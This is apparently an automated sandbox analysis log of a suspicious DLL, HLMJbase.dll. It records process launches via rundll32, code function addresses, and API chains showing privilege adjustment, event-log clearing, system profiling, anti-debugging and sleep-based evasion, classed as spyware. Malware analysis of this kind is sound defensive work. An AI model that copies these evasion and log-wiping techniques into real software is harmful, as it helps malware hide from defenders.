Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBCCAD03_2_6CBCCAD0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC18A773_2_6CC18A77
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBF0B403_2_6CBF0B40
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBC84303_2_6CBC8430
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBF653C3_2_6CBF653C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC5A5083_2_6CC5A508
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBF255C3_2_6CBF255C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBC66D93_2_6CBC66D9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBDA64D3_2_6CBDA64D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC487803_2_6CC48780
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC247193_2_6CC24719
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBDC1AC3_2_6CBDC1AC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC441F03_2_6CC441F0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC062913_2_6CC06291
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBEE3C73_2_6CBEE3C7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC523503_2_6CC52350
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC63CF43_2_6CC63CF4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBCBDB13_2_6CBCBDB1
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBD9D263_2_6CBD9D26
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC4BD703_2_6CC4BD70
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC3BD1C3_2_6CC3BD1C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBEDD453_2_6CBEDD45
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBE5E163_2_6CBE5E16
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC4DFFE3_2_6CC4DFFE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC49F403_2_6CC49F40
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC23F753_2_6CC23F75
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC618D73_2_6CC618D7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC438803_2_6CC43880
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC1BA523_2_6CC1BA52
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC59BE53_2_6CC59BE5
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC35B143_2_6CC35B14
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBE54EF3_2_6CBE54EF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC4347E3_2_6CC4347E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC0B5373_2_6CC0B537
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBCF61C3_2_6CBCF61C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC056743_2_6CC05674
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBDD0F73_2_6CBDD0F7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC410603_2_6CC41060
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC2D2463_2_6CC2D246
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC6524A3_2_6CC6524A
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC493703_2_6CC49370
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04677D403_2_04677D40
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0467DD003_2_0467DD00
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0466659F3_2_0466659F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04661E5F3_2_04661E5F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0467D7AF3_2_0467D7AF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0466681F3_2_0466681F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0467D25E3_2_0467D25E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0466822F3_2_0466822F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0467F3BE3_2_0467F3BE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031117504_2_03111750
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_03111E2C4_2_03111E2C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0310B6A64_2_0310B6A6
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_03112D614_2_03112D61
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031111FF4_2_031111FF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031024B04_2_031024B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_03110CAE4_2_03110CAE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_055A6E604_2_055A6E60
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_055A6BE04_2_055A6BE0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_055BDDF04_2_055BDDF0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_055A24A04_2_055A24A0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_055BF9FF4_2_055BF9FF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_055A88704_2_055A8870
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_055BD89F4_2_055BD89F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_055BE3414_2_055BE341
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_055B83814_2_055B8381
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_055BEA1D4_2_055BEA1D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04E5659F4_2_04E5659F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04E67D404_2_04E67D40
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04E6DD004_2_04E6DD00
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04E51E5F4_2_04E51E5F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04E6D7AF4_2_04E6D7AF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04E5681F4_2_04E5681F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04E6D25E4_2_04E6D25E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04E5822F4_2_04E5822F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04E6F3BE4_2_04E6F3BE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_030B17505_2_030B1750
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_030B1E2C5_2_030B1E2C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_030AB6A65_2_030AB6A6
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_030B2D615_2_030B2D61
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_030B11FF5_2_030B11FF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_030B0CAE5_2_030B0CAE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_030A24B05_2_030A24B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_05356E605_2_05356E60
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_05356BE05_2_05356BE0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0536DDF05_2_0536DDF0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_053524A05_2_053524A0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0536F9FF5_2_0536F9FF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_053588705_2_05358870
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0536D89F5_2_0536D89F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0536E3415_2_0536E341
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_053683815_2_05368381
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0536EA1D5_2_0536EA1D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04B9659F5_2_04B9659F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04BADD005_2_04BADD00
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04BA7D405_2_04BA7D40
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04B91E5F5_2_04B91E5F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04BAD7AF5_2_04BAD7AF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04B9681F5_2_04B9681F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04B9822F5_2_04B9822F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04BAD25E5_2_04BAD25E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04BAF3BE5_2_04BAF3BE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6CBC8880 appears 46 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 053642E0 appears 32 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6CC622D0 appears 145 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 055B42E0 appears 32 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6CC625D0 appears 47 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 04DC42E0 appears 32 times
Source: HLMJbase.dllStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL
Source: HLMJbase.dllBinary string: HandleAfdPollInfo\Device\Afd\Mio
Source: HLMJbase.dllBinary string: Failed to open \Device\Afd\Mio:
Source: classification engineClassification label: mal72.spyw.evad.winDLL@10/0@1/2
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC49F40 memset,GetModuleHandleW,FormatMessageW,memmove,GetLastError,3_2_6CC49F40
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB75A0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,OpenProcess,3_2_04DB75A0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB76C0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,3_2_04DB76C0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB7AF0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,3_2_04DB7AF0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_055A75A0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,OpenProcess,4_2_055A75A0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_055A76C0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,4_2_055A76C0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_055A7AF0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,4_2_055A7AF0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_053575A0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,OpenProcess,5_2_053575A0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_053576C0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,5_2_053576C0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_05357AF0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,5_2_05357AF0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB6BE0 wsprintfW,GetDriveTypeW,GetDiskFreeSpaceExW,_memset,GlobalMemoryStatusEx,swprintf,swprintf,3_2_04DB6BE0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB5FE0 _memset,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,CloseHandle,3_2_04DB5FE0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB6620 wsprintfW,CoInitialize,CoCreateInstance,SysFreeString,SysFreeString,CoUninitialize,3_2_04DB6620
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\2024.12.19
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7004:120:WilError_03
Source: HLMJbase.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\HLMJbase.dll,NvOptimusEnablement
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\HLMJbase.dll"
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HLMJbase.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\HLMJbase.dll,NvOptimusEnablement
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HLMJbase.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HLMJbase.dll",NvOptimusEnablement
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HLMJbase.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\HLMJbase.dll,NvOptimusEnablementJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HLMJbase.dll",NvOptimusEnablementJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HLMJbase.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: HLMJbase.dllStatic file information: File size 1071104 > 1048576
Source: HLMJbase.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: HLMJbase.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: HLMJbase.pdb source: rundll32.exe, 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3546373145.000000006CC66000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.3546252526.000000006CC66000.00000002.00000001.01000000.00000003.sdmp, HLMJbase.dll
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0420C52C LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_0420C52C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04209EF5 push ecx; ret 3_2_04209F08
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04217AFF push eax; retn 0000h3_2_04217B05
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DD2450 push ebp; retf 3_2_04DD2474
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DD2470 push ebp; retf 3_2_04DD2474
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DDA0B8 push eax; ret 3_2_04DDA119
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DDA168 push eax; ret 3_2_04DDA119
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DC4325 push ecx; ret 3_2_04DC4338
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04673CE4 push ecx; ret 3_2_04673CF7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_03109EF5 push ecx; ret 4_2_03109F08
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_03117AFF push eax; retn 0000h4_2_03117B05
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_055C2450 push ebp; retf 4_2_055C2474
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_055C2443 push ebp; retf 4_2_055C2474
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_055C2470 push ebp; retf 4_2_055C2474
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_055CA168 push eax; ret 4_2_055CA119
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_055CA0B8 push eax; ret 4_2_055CA119
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_055B4325 push ecx; ret 4_2_055B4338
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04E63CE4 push ecx; ret 4_2_04E63CF7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_030B7AFF push eax; retn 0000h5_2_030B7B05
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_030A9EF5 push ecx; ret 5_2_030A9F08
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_05372470 push ebp; retf 5_2_05372474
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_05372450 push ebp; retf 5_2_05372474
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_05372443 push ebp; retf 5_2_05372474
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_05364325 push ecx; ret 5_2_05364338
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04BA3CE4 push ecx; ret 5_2_04BA3CF7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DBB351 OpenEventLogW,OpenEventLogW,ClearEventLogW,CloseEventLog,3_2_04DBB351
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 9025Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 8975Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 9047Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Windows\SysWOW64\rundll32.exe TID: 4444Thread sleep count: 299 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6344Thread sleep count: 9025 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6344Thread sleep time: -90250s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 4948Thread sleep count: 293 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6640Thread sleep count: 8975 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6640Thread sleep time: -89750s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6740Thread sleep count: 230 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7024Thread sleep count: 9047 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7024Thread sleep time: -90470s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exeThread sleep count: Count: 9025 delay: -10Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread sleep count: Count: 8975 delay: -10Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread sleep count: Count: 9047 delay: -10Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB8060 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,3_2_04DB8060
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB53C0 _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,3_2_04DB53C0
Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
Source: rundll32.exe, 00000003.00000003.1730093952.000000000289D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.3543030625.000000000287A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1698689251.000000000289E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1730125358.000000000289E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1698599756.000000000289D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1729791896.000000000289D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3542816522.0000000002E9C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1794106955.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1730735202.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1730835411.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1699780132.0000000002E9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_3-108385
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04206510 IsDebuggerPresent,3_2_04206510
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DC04AB VirtualProtect ?,-00000001,00000104,?3_2_04DC04AB
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0420C52C LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_0420C52C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_046600CD mov eax, dword ptr fs:[00000030h]3_2_046600CD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04E500CD mov eax, dword ptr fs:[00000030h]4_2_04E500CD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04B900CD mov eax, dword ptr fs:[00000030h]5_2_04B900CD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_042142C7 GetProcessHeap,3_2_042142C7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04206530 SetUnhandledExceptionFilter,GetConsoleWindow,ShowWindow,GetCurrentThreadId,PostThreadMessageA,GetInputState,CreateThread,WaitForSingleObject,CloseHandle,Sleep,3_2_04206530
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_042069D5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_042069D5
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04208678 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_04208678
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0420AFAE SetUnhandledExceptionFilter,3_2_0420AFAE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DBDE70 Sleep,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,3_2_04DBDE70
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DC1EC7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_04DC1EC7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DBEF64 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_04DBEF64
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC61C22 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6CC61C22
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC616E3 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6CC616E3
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_03106530 SetUnhandledExceptionFilter,GetConsoleWindow,ShowWindow,GetCurrentThreadId,PostThreadMessageA,GetInputState,CreateThread,WaitForSingleObject,CloseHandle,Sleep,4_2_03106530
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0310AFAE SetUnhandledExceptionFilter,4_2_0310AFAE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_03108678 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_03108678
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_031069D5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_031069D5
